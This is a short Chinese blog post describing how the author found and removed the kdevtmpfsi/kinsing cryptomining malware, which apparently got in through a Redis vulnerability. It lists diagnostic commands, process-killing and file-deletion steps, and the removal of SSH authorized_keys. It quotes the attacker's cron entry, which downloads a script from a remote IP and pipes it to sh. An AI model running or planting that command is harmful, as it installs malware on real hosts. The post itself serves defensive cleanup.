分类 标签 存档 社区 博客 友链 GitHub 订阅 搜索

redis bug 导致的挖矿程序 kdevtmpfsi 病毒

31 浏览

  • top

=> kdevtmpfsi 占用 100% 的 CPU

  • netstat -natp

=》根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生 ip,查出为国外 ip,估计主机被人种后门了

  • crontab -l

=》发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

  • 解决:
  1. kdevtmpfsi 有守护进程,单独 kill 掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要 kill 后才能解决问题
  2. ps -aux | grep kinsing =》kill
  3. ps -aux | grep kdevtmpfsi =》 kill
  4. rm -rf /tmp/kdevtmpfsi && rm -rf /var/tmp/kinsing

=> 确认是否清除干净:
find / -name kdevtmpfsi
find / -name kinsing

  1. crontab -e 删除异常的定时任务
  2. 确认是否存在异常的公钥文件
    cd .ssh/
    VIM authorized_keys #由于我不用,因此全部删除
    rm -f authorized_keys
评论  
留下你的脚步
推荐阅读